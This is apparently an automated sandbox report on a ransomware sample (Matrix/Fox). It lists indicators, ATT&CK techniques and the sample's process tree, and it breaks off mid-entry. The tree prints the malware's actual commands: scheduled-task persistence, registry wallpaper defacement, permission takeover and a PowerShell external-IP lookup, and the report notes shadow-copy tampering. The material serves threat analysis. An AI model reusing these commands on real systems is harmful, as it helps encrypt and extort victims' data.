File opened (read-only)	\??\L:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\H:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\A:	nt7HdeS164.exe
File opened (read-only)	\??\B:	nt7HdeS164.exe
File opened (read-only)	\??\S:	nt7HdeS164.exe
File opened (read-only)	\??\W:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\U:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\T:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\I:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\Y:	nt7HdeS164.exe
File opened (read-only)	\??\I:	nt7HdeS164.exe
File opened (read-only)	\??\K:	nt7HdeS164.exe
File opened (read-only)	\??\L:	nt7HdeS164.exe
File opened (read-only)	\??\R:	nt7HdeS164.exe
File opened (read-only)	\??\V:	nt7HdeS164.exe
File opened (read-only)	\??\P:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\H:	nt7HdeS164.exe
File opened (read-only)	\??\P:	nt7HdeS164.exe
File opened (read-only)	\??\Q:	nt7HdeS164.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 myexternalip.com

flow	ioc
8	myexternalip.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\aehUlKm1.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18237_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14867_.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0234376.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04323_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR15F.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7EN.LEX	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Uzhgorod	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188667.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Marquesas	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Pushpin.thmx	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Barbados	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\TAB_ON.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Mozilla Firefox\uninstall\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guatemala	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBWZINT.REST.IDX_DLL	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\OIS_COL.HXC	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGREPFRM.XML	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL102.XML	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATWIZ.POC	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\SLERROR.XML	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierUpArrow.jpg	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00448_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\WANS.NET.XML	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21534_.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CHECKER.POC	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746G.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10308_.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\meta-index	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0279644.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ro.txt	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\Xlate_Init.xsn	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSACC.OLB	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2892 schtasks.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

2304 vssadmin.exe
2960 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exent7HdeS164.exepowershell.exe

pid process

2712 powershell.exe
4796 nt7HdeS164.exe
4796 nt7HdeS164.exe
4796 nt7HdeS164.exe
2020 powershell.exe
2020 powershell.exe
2020 powershell.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

nt7HdeS164.exe

pid process

4796 nt7HdeS164.exe

pid	process
2892	schtasks.exe

pid	process
2304	vssadmin.exe
2960	vssadmin.exe

pid	process
2712	powershell.exe
4796	nt7HdeS164.exe
4796	nt7HdeS164.exe
4796	nt7HdeS164.exe
2020	powershell.exe
2020	powershell.exe
2020	powershell.exe

pid	process
4796	nt7HdeS164.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

Processes:

powershell.exent7HdeS164.exevssvc.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	4796	nt7HdeS164.exe
Token: SeLoadDriverPrivilege	4796	nt7HdeS164.exe
Token: SeBackupPrivilege	4848	vssvc.exe
Token: SeRestorePrivilege	4848	vssvc.exe
Token: SeAuditPrivilege	4848	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1712	WMIC.exe
Token: SeSecurityPrivilege	1712	WMIC.exe
Token: SeTakeOwnershipPrivilege	1712	WMIC.exe
Token: SeLoadDriverPrivilege	1712	WMIC.exe
Token: SeSystemProfilePrivilege	1712	WMIC.exe
Token: SeSystemtimePrivilege	1712	WMIC.exe
Token: SeProfSingleProcessPrivilege	1712	WMIC.exe
Token: SeIncBasePriorityPrivilege	1712	WMIC.exe
Token: SeCreatePagefilePrivilege	1712	WMIC.exe
Token: SeBackupPrivilege	1712	WMIC.exe
Token: SeRestorePrivilege	1712	WMIC.exe
Token: SeShutdownPrivilege	1712	WMIC.exe
Token: SeDebugPrivilege	1712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1712	WMIC.exe
Token: SeRemoteShutdownPrivilege	1712	WMIC.exe
Token: SeUndockPrivilege	1712	WMIC.exe
Token: SeManageVolumePrivilege	1712	WMIC.exe
Token: 33	1712	WMIC.exe
Token: 34	1712	WMIC.exe
Token: 35	1712	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1712	WMIC.exe
Token: SeSecurityPrivilege	1712	WMIC.exe
Token: SeTakeOwnershipPrivilege	1712	WMIC.exe
Token: SeLoadDriverPrivilege	1712	WMIC.exe
Token: SeSystemProfilePrivilege	1712	WMIC.exe
Token: SeSystemtimePrivilege	1712	WMIC.exe
Token: SeProfSingleProcessPrivilege	1712	WMIC.exe
Token: SeIncBasePriorityPrivilege	1712	WMIC.exe
Token: SeCreatePagefilePrivilege	1712	WMIC.exe
Token: SeBackupPrivilege	1712	WMIC.exe
Token: SeRestorePrivilege	1712	WMIC.exe
Token: SeShutdownPrivilege	1712	WMIC.exe
Token: SeDebugPrivilege	1712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1712	WMIC.exe
Token: SeRemoteShutdownPrivilege	1712	WMIC.exe
Token: SeUndockPrivilege	1712	WMIC.exe
Token: SeManageVolumePrivilege	1712	WMIC.exe
Token: 33	1712	WMIC.exe
Token: 34	1712	WMIC.exe
Token: 35	1712	WMIC.exe
Token: SeDebugPrivilege	2020	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.execmd.execmd.execmd.execmd.exewscript.execmd.exe

description	pid	process	target process
PID 2856 wrote to memory of 2284	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 2284	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 2284	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 2284	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 2464	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	NWtN47iM.exe
PID 2856 wrote to memory of 2464	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	NWtN47iM.exe
PID 2856 wrote to memory of 2464	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	NWtN47iM.exe
PID 2856 wrote to memory of 2464	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	NWtN47iM.exe
PID 2856 wrote to memory of 2268	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 2268	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 2268	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 2268	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2268 wrote to memory of 2712	2268	cmd.exe	powershell.exe
PID 2268 wrote to memory of 2712	2268	cmd.exe	powershell.exe
PID 2268 wrote to memory of 2712	2268	cmd.exe	powershell.exe
PID 2268 wrote to memory of 2712	2268	cmd.exe	powershell.exe
PID 2856 wrote to memory of 1920	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 1920	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 1920	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 1920	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 332	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 332	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 332	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 332	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1920 wrote to memory of 668	1920	cmd.exe	reg.exe
PID 1920 wrote to memory of 668	1920	cmd.exe	reg.exe
PID 1920 wrote to memory of 668	1920	cmd.exe	reg.exe
PID 1920 wrote to memory of 668	1920	cmd.exe	reg.exe
PID 332 wrote to memory of 592	332	cmd.exe	wscript.exe
PID 332 wrote to memory of 592	332	cmd.exe	wscript.exe
PID 332 wrote to memory of 592	332	cmd.exe	wscript.exe
PID 332 wrote to memory of 592	332	cmd.exe	wscript.exe
PID 1920 wrote to memory of 984	1920	cmd.exe	reg.exe
PID 1920 wrote to memory of 984	1920	cmd.exe	reg.exe
PID 1920 wrote to memory of 984	1920	cmd.exe	reg.exe
PID 1920 wrote to memory of 984	1920	cmd.exe	reg.exe
PID 1920 wrote to memory of 1752	1920	cmd.exe	reg.exe
PID 1920 wrote to memory of 1752	1920	cmd.exe	reg.exe
PID 1920 wrote to memory of 1752	1920	cmd.exe	reg.exe
PID 1920 wrote to memory of 1752	1920	cmd.exe	reg.exe
PID 2856 wrote to memory of 1780	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 1780	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 1780	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2856 wrote to memory of 1780	2856	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1780 wrote to memory of 1152	1780	cmd.exe	attrib.exe
PID 1780 wrote to memory of 1152	1780	cmd.exe	attrib.exe
PID 1780 wrote to memory of 1152	1780	cmd.exe	attrib.exe
PID 1780 wrote to memory of 1152	1780	cmd.exe	attrib.exe
PID 592 wrote to memory of 3108	592	wscript.exe	cmd.exe
PID 592 wrote to memory of 3108	592	wscript.exe	cmd.exe
PID 592 wrote to memory of 3108	592	wscript.exe	cmd.exe
PID 592 wrote to memory of 3108	592	wscript.exe	cmd.exe
PID 3108 wrote to memory of 2892	3108	cmd.exe	schtasks.exe
PID 3108 wrote to memory of 2892	3108	cmd.exe	schtasks.exe
PID 3108 wrote to memory of 2892	3108	cmd.exe	schtasks.exe
PID 3108 wrote to memory of 2892	3108	cmd.exe	schtasks.exe
PID 1780 wrote to memory of 1264	1780	cmd.exe	cacls.exe
PID 1780 wrote to memory of 1264	1780	cmd.exe	cacls.exe
PID 1780 wrote to memory of 1264	1780	cmd.exe	cacls.exe
PID 1780 wrote to memory of 1264	1780	cmd.exe	cacls.exe
PID 1780 wrote to memory of 3904	1780	cmd.exe	takeown.exe
PID 1780 wrote to memory of 3904	1780	cmd.exe	takeown.exe
PID 1780 wrote to memory of 3904	1780	cmd.exe	takeown.exe
PID 1780 wrote to memory of 3904	1780	cmd.exe	takeown.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

1152 attrib.exe

pid	process
1152	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWtN47iM.exe"
2⤵
PID:2284

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWtN47iM.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWtN47iM.exe" -n
2⤵
- Executes dropped EXE
PID:2464

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Kc1sJfyH.txt"
2⤵
- Suspicious use of WriteProcessMemory
PID:2268

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\aehUlKm1.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1920

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\aehUlKm1.bmp" /f
3⤵
- Sets desktop wallpaper using registry
PID:668

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
3⤵
PID:984

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
3⤵
PID:1752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\TQjosvO6.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:332

C:\Windows\SysWOW64\wscript.exe
wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\TQjosvO6.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\1XP4PlhR.bat" /sc minute /mo 5 /RL HIGHEST /F
4⤵
- Suspicious use of WriteProcessMemory
PID:3108

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\1XP4PlhR.bat" /sc minute /mo 5 /RL HIGHEST /F
5⤵
- Creates scheduled task(s)
PID:2892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
4⤵
PID:2964

C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /I /tn DSHCA
5⤵
PID:4868

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\erg3H7Vx.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
2⤵
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\SysWOW64\attrib.exe
